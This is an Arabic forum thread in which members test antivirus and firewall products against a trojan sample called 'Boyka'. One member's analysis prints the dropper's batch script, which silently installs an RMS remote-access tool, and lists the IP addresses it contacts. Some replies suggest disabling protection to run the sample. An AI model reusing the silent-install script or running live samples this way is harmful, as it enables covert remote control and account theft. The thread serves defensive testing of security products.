عـيـنة تورجان Boyka

المصدر: تورجان Boyka
في منتدى : منتدى نقاشات واختبارات برامج الحماية

السلام عليكم ورحمة الله وبركاته

هذا تورجان خطير مربوط بايبهات حقيقية

يرجي الحذر جدا عند التجربة

احذروووو من بويكا

هذا المحتوى يظهر للاعضاء المسجلين فقط:

هذا المحتوى يظهر للاعضاء المسجلين فقط:

هذا المحتوى يظهر للاعضاء المسجلين فقط:

هذا المحتوى يظهر للاعضاء المسجلين فقط:

​

 

جار رصد الايبيهات

 

تحليل سريع للملف

اولا الملف مضغوط بال winrar

يقوم باستخراج ملف بات ليقوم ببدا تسطيب نفسه

تعليمات ملف البات

كود PHP:

@chcp 1251
@MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /passive REBOOT=ReallySuppress
@MsiExec /x {AB7AA605-500F-4153-8207-FB5563419112} /passive REBOOT=ReallySuppress
@ping 127.0.0.1
@MsiExec /I "rms5.2.1_server.msi" /qn


الملف عباره عن اداه تحكم عن بعد ( تعرف باسم رات غير شرعى )

الاى بهات التى يتصل بها

63.245.217.137 البورت 443
90.156.241.111 البورت 80
54.218.32.9 البورت 443
93.184.220.29 البورت 80
63.245.215.110 البورت 80
68.232.34.191 البورت 443
93.184.221.133 البورت 80
173.194.112.126 البورت 443
93.158.134.119 البورت 443
173.194.112.40 البورت 80
173.194.112.37 البورت 443
63.245.217.219 البورت 443
184.50.238.136 البورت 80

يرجى الحذر عن التجربه

 

Good Job

 

اوت بوست سكيورتي
الملف بالفعل خطير بأستمرار الاتصال يبقى المتصفح مفتوح واعتقد يتم سرقة الحسابات المحفوظة

هذا المحتوى يظهر للاعضاء المسجلين فقط:

هذا المحتوى يظهر للاعضاء المسجلين فقط:

 

جربت العينة مع البرايفت فاير وول ورصد نفس الذي رصده جدار الاوت بوست
للأسف الصور انمسحت

 

وهذا اذا دل على شى

يدل على ان البرايفت فايروول رغم بساططته فى عمله الا انه يقارع الكبار

 

بالضبط يا صديقي
هل نستمر بالتجربة ام نتحول للأيكاروس ؟؟

 

وعليكم السلام ورحمة الله وبركاته
السيد كاسبرسمول3بمجرد فك الضغط نسفه حتى انى لم اشاهد ماشكله


حذف اربع ملفات حذف من الجذور

 

جرب التشغيل وسترى العجب

 

الحصان 10 لم يكتشفه لا بفك الضغط ولا بالفحص

والحقيقة اخشى من التشغيل

 

جمد الجهاز واكيد سيتم اكتشافه.الحصان فى مثل هكذا تشفيرات قوى جدآ

 

الكاسبر مكتشفه بمجرد فك الضغط فكيف يعنى اجرب التشغيل.اوقف حماية الكاسبر مثلآ واشغله

 

الا يوجد في الكاسبر استثناء ؟؟ استثني الملف وجرب اذا تحب اخي الغالي

 

ماذا تستفيدون من كشف الفايروس

 

اهلا بيك اخى

لماذا نقوم بالاختبار

الاختبار هنا يكون لبرامج الحمايه هل ستقوم باكتشاف الملف على انه خبيث ام حميد

لان هناك بعض البرامج ترى ان الملف نظيف والبعض الاخر يرى انه حميد

اذا السوال لماذا نقوم بالاختبار

لكى نحدد ما اذا كان الملف فعلا مخبيث او لا

هنا الاخوه الكرام فى المنتدى بعضهم يكتفى بالفحص فقط بدون تشغيل العينه وهذا راجع الى ان العينات تاتى من الخارج ويرجى الحزر بشده عند التعامل مع هذه النوعيه من الملفات

طيب ما ضرر العينات التى تاتى من الخارج

تتنوع ضرر الاصابه من نوع عينه الى اخرى

فهناك عينه اثارها تدميريه على النظام لديك اى تقوم بتدمير النظام وملفاتك

هناك عينات اخرى هدفها اختراقك وهذه العينات منتشره بكثره ونوع هذه العينات خطرها اقوى من السابقه لانها تقوم بالتجسس عليك وعلى ما تفعل طول اليوم فى جهازك

هناك عينات اخرى هدفها ان تقوم بسرقه الحسابات الشخصيه الخاصه بك مثل حسابات الفيزا كارد وغيرها من الحسابات المهمه الحساسه التى يعتبرها البعض اكثر شى حساس

كما ذكرت لك اخى العينات التى تجلب من الخارج خطيره جدا لذلك يرجى الانتباه لمن يجربها

هناك بعض الاشخاص هنا لا يكتفى بالفحص فقط وانما يقوم بتشغيل العينه لاختبار باقى وحدات الحمايه

منها محلل السلوك - الهبس - الجدار النارى - السحاب - الهيروستك

وغيرها الكثير من تقنيات الحمايه

اذا فى النهايه نقول لماذا تم اختراع برامج الحمايه وما سبب تطورها الى هذا الحد

هذا راجع الى كثره الاختبارات التى نجريها هنا بل وايضا التى تجرى فى الخارج ايضا

ارجو ان كون وفقت اخى فى شرح بسيط لما نفعله فى القسم

واى سوال او استفسار انا حاضر

تحياتى وتقديرى

 

هده افضل اجابة شكرا يا معلم

 

سوف اعيد التجربه على النسخه الأنجيليزيه